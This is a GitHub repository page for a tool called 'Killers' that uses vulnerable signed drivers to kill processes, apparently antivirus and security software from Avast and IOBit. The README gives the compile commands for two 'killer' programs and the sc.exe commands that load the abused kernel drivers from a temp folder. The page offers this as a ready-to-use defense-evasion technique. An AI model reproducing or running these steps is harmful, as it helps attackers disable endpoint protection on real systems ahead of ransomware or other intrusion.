Skip to content

y11en/Killers

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Killers

Avast

https://www.loldrivers.io/drivers/57fc510a-e649-4599-b83e-8f3605e3d1d9/

x86_64-w64-mingw32-gcc -o avast_killer.exe avast_killer.c 
sc.exe create aswArPot.sys binPath= C:\windows\temp\aswArPot.bin type= kernel && sc.exe start aswArPot.sys

IOBit Malware Fighter

https://www.loldrivers.io/drivers/fe2f68e1-e459-4802-9a9a-23bb3c2fd331

x86_64-w64-mingw32-gcc -o iobit_malwarefighter_killer.exe iobit_malwarefighter_killer.c 
sc.exe create kEvP64.sy binPath= C:\windows\temp\kEvP64.bin type= kernel && sc.exe start kEvP64.sy

About

using lol drivers, kill process

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages

  • C 100.0%